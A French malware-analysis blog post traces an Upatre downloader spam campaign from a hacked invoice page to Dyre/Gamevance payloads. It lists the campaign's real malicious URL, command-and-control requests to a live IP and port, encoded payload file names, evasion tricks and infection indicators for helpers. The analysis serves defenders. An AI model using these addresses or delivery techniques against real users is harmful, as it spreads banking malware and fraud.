Novembre 2013, Malekal relayait un compte-rendu de CTU avec la nouvelle en français : Cryptowall a dépassé les 625,000 infections. Fin mai 2014, des serveurs stratégiques sont saisis suite à des perquisitions. L'Operation Tovar entrainera la chute d'un botnet très sophistiqué nommé "Gameover Zeus" et l'arrestation du chef d'un gang de criminels, Evgeniy Mikhailovich Bogachev, en relation avec CryptoLocker. Fort à parier que la fiche de Bogachev restera placardée un moment sur le Cyber Most Wanted du FBI. Durant la conduite de l'opération, les cybercriminels tenteront en vain de dupliquer les données mais celles-ci seront interceptées. À la suite de quoi, données en main, il fût relativement facile d'évaluer l'ampleur des attaques et de rendre les déchiffrages par CryptoLocker possibles. Un portail nommé Decrypt Cryptolocker pointa rapidement son nez pour venir en aide aux malheureux internautes infectés. Certains médias estiment cette fraude à environ 7 millions de dollars. Parenthèse, montant qui semble dérisoire comparé aux récentes révélations de l'ICIJ sur les Luxembourg Leaks avec des pertes qui se chiffrent en milliards, mais que voulez-vous... fin de parenthèse.
Alors me direz-vous, quel rapport avec Upatre ?
" Since late March 2014, CryptoWall has been primarily distributed through malicious attachments and download links sent through the Cutwail spam botnet. These Cutwail spam email attachments typically distribute the Upatre downloader, which retrieves CryptoWall samples hosted on compromised websites. Upatre was the primary method of distributing the Gameover Zeus banking trojan until Operation Tovar disrupted that ecosystem in May 2014. Upatre has also been used to distribute the Dyre banking trojan. In June 2014, the malicious emails began including links to legitimate cloud hosting providers such as Dropbox, Cubby, and MediaFire. The links point to ZIP archives that contain a CryptoWall executable. " (CTU)
Qu'en est-il de ces courriels malicieux ? Les détections sont-elles toujours aussi mauvaises ?
Vendredi 7 novembre 2014 - un pourriel arrive chez Malekal.
Même recette que par le passé: courriel + voice message + lien vers site piraté
GET http://bayonmart.com/documents/invoice0711_pdf.php
nb: ces liens sont régulièrement actualisés, notez le 0711, date du jour.
JavaScript est utilisé pour préparer une requête en méthode POST.
POST http://bayonmart.com/documents/invoice0711_pdf.php?h=800&w=600&ua=Mozilla%2F5.0
Les dimensions de l'écran et l'user-agent (UA) du navigateur sont envoyées.
Suite à cette requête, le contenu de la page est différent.
L'iframe "mcnt" située en amont va se charger de ré-écrire la page.
Générer des statistiques ( ex: géolocalisation ) et aussi forcer le clique sur le lien "mylink".
"mylink" n'est autre qu'un lien contenant des données encodées en base64. ( RFC2397 - data URL scheme )
Le MIME "application/zip" stipule la nature des données
Et "download", le nom du fichier "invoice-0711_pdf54.zip".
Un timeout viendra rediriger vers le site d'une banque.
Un seul fichier qui contient tout, les ré-écritures de la page, les informations glanées (stats), l'usage de la méthode POST, le ZIP embarqué, la redirection vers la banque qui vient masquer.. c'est plutôt bien pensé.
Le fichier ZIP fait ~8Ko. À l'extraction, il y a un programme écrit en Visual C++ d'~21Ko détécté par 0 / 20. À l'exécution, il se copie dans "%TMP%" et débute le téléchargement de fichiers suivant une configuration embarquée. On notera que les fichiers *.scg sont situés sur un seul et même hébergeur gratuit, AwardSpace.
Il commence par contacter le C&C avec l'UA "enupdate".
A noter que le nom de la machine (en gras) transite dans la requête.
GET http://94.23.62.185:19701/0711uk2/GOTCHA/0/51-SP3/0/
GET http://94.23.62.185:19701/0711uk2/GOTCHA/1/0/0/
Puis télécharge avec l'UA "enupdate" le fichier encodé "cheluk-12.scg".
Décodé aussitôt depuis le buffer du socket.
L'amorce située en début du fichier décodé va opérer un RtlDecompressBuffer.
"cheluk-12.scg" décodé et décompressé retourne un programme d'un poids d'~476Ko avec une détection de 12 / 22. Une vue sur les ressources du programme permet de repérer qu'un second PE est dissimulé.
Ce nouveau PE d'~475Ko est détecté à 4 / 22.
nb: Seul Kaspersky assure sur ce coups.
Un programme d'~310Ko détecté par 10 / 21 comme Gen:Variant.Adware.Gamevance.4 sera déposé. Celui-ci est aisément identifiable sur une machine infectée puisqu'il créer un service nommé "Google Update Service" vers un exécutable situé dans "%WINDIR%" ou "%APPDATA%".
Pour les helpers, la ligne visible sous HijackThis ressemblera à:
"O23 - Service: Google Update Service (googleupdate) - C:\WINDOWS\ZVBWRoVHgvKTAPi.exe"
Upatre diffuse Trojan.Win32.Staser / Adware.Gamevance / BATTDIL / DYREZA / DYRE / DYRANGES
Liste des serveurs STUN:
203.183.172.196:3478
numb.viagenie.ca
s1.taraba.net
s2.taraba.net
stun1.l.google.com:19302
stun1.voiceeclipse.net
stun2.l.google.com:19302
stun.2talk.co.nz
stun3.l.google.com:19302
stun4.l.google.com:19302
stun.callwithus.com
stun.ekiga.net
stun.faktortel.com.au
stun.ideasip.com
stun.internetcalls.com
stun.ipshka.com
stun.iptel.org
stun.l.google.com:19302
stun.noc.ams-ix.net
stun.phonepower.com
stun.rixtelecom.se
stun.schlund.de
stunserver.org
stun.sipgate.net
stun.stunprotocol.org
stun.voip.aebc.com
stun.voiparound.com
stun.voipbuster.com
stun.voipstunt.com
stun.voxgratia.org
À toute fin utile, un rapide historique de publications du blog Trend Micro concernant Upatre.
➱ ( January 7th, 2014 ) ❴ A Year of Spam: The Notable Trends of 2013 ❵
➱ ( April 4th, 2014 ) ❴ UPATRE Ups the Ante With Attachment Inside An Attachment ❵
➱ ( April 22nd, 2014 ) ❴ The Timely Tale of Tax-related Threat Troubles ❵
➱ ( June 9th, 2014 ) ❴ Social Engineering Watch: UPATRE Malware Abuses Dropbox Links ❵
➱ ( July 24th, 2014 ) ❴ 1H 2014 Spam Attacks and Trends ❵
➱ ( October 8th, 2014 ) ❴ A Closer Look At DYRE Malware, Part 1 ❵
➱ ( October 10th, 2014 ) ❴ A Closer Look At DYRE Malware, Part 2 ❵
➱ ( October 16th, 2014 ) ❴ CUTWAIL Spambot Leads to UPATRE-DYRE Infection ❵
➱ ( November 12th, 2014 ) ❴ Evolution of Upatre Trojan Downloader ❵
➱ ( January 24th, 2015 ) ❴ New DYRE Variant Hijacks Microsoft Outlook, Expands Targeted Banks ❵
➱ ( April 20th, 2015 ) ❴ Upatre - Say No to Drones, Say Yes to Malware ❵
➱ ( ?, 2015 ) ❴ Keeping up with the damage of UPATRE ❵
➱ ( June 10, 2015 ) ❴ MRE :: Upatre - Unpacking ❵
➱ ( June 14, 2015 ) ❴ MRE :: Upatre - Config ❵
➱ ( June 16, 2015 ) ❴ MRE :: Upatre - Main-Loop ❵
BATTDIL / DYREZA / DYRE / DYRANGES
➱ ( June 13th, 2014 ) ❴ Project Dyre: New RAT Slurps Bank Credentials, Bypasses SSL ❵
➱ ( July 17th, 2014 ) ❴ Slava Ukraini: Dyre Returns ❵
➱ ( October 29th, 2014 ) ❴ Dyreza aims at Swiss banks ❵
➱ ( November 6th, 2014 ) ❴ Two Attacks... Two Dyres... All Infrastructure ❵
➱ ( December 12th, 2014 ) ❴ Spammers Accelerate Dyre Distribution ❵
➱ ( January 16th, 2015 ) ❴ The Evolution of Upatre and Dyre ❵
➱ ( March 6th, 2015 ) ❴ Dyre Targets More Websites ❵
➱ ( March 30th, 2015 ) ❴ Dyre/Dyreza: An Analysis to Discover the DGA ❵
➱ ( April 2nd, 2015 ) ❴ The Dyre wolf: Attacks on corporate banking accounts ❵
➱ ( April 21th, 2015 ) ❴ Dyre Spreading Using Code-Signing Certificates, HTTPS ❵
➱ ( April 22nd, 2015 ) ❴ Chasing cybercrime: network insightsof Dyre & Dridex Trojan bankers ❵
➱ ( April 30th, 2015 ) ❴ New Dyre Version- Yet Another Malware Evading Sandboxes ❵
➱ ( May 4th, 2015 ) ❴ Updated Dyre, Dropped by Office Macros ❵
➱ ( May 8th, 2015 ) ❴ Does Dyre malware play nice in your sandbox ? ❵
➱ ( June 2nd, 2015 ) ❴ DYRE Banking Malware Upsurges ; Europe & North America Most Affected ❵
➱ ( June 11th, 2015 ) ❴ Dyre Configuration Process Dumper ❵
➱ ( June 19th, 2015 ) ❴ Dyre: Emerging threat on financial fraud landscape ❵
➱ ( June 29th, 2015 ) ❴ Crooks use hacked routers to aid cyberheists ❵
➱ ( July 13th, 2015 ) ❴ Extracting Dyre Configuration From A Process Dump ❵
➱ ( July 14th, 2015 ) ❴ New Configuration of the Dyre Trojan Coming After 17 Spanish Banks ❵
➱ ( July 16th, 2015 ) ❴ Inside the Dyre Wolf malware campaign ❵
➱ ( October 7th, 2015 ) ❴ Dyreza Campaigners Set Sights on the Fulfillment and Warehousing Industry ❵
➱ ( November 2th, 2015 ) ❴ A Technical Look At Dyreza ❵
➱ ( November 17th, 2015 ) ❴ Security Alert - New Dyreza Variant Supports Windows 10 Edge ❵
➱ ( February 9th, 2016 ) ❴ Top cybercrime ring disrupted as authorities raid Moscow offices ❵
→ Dyre Tracker ( thx Xyl )
edit: Multiples ajouts de liens hypertextes.
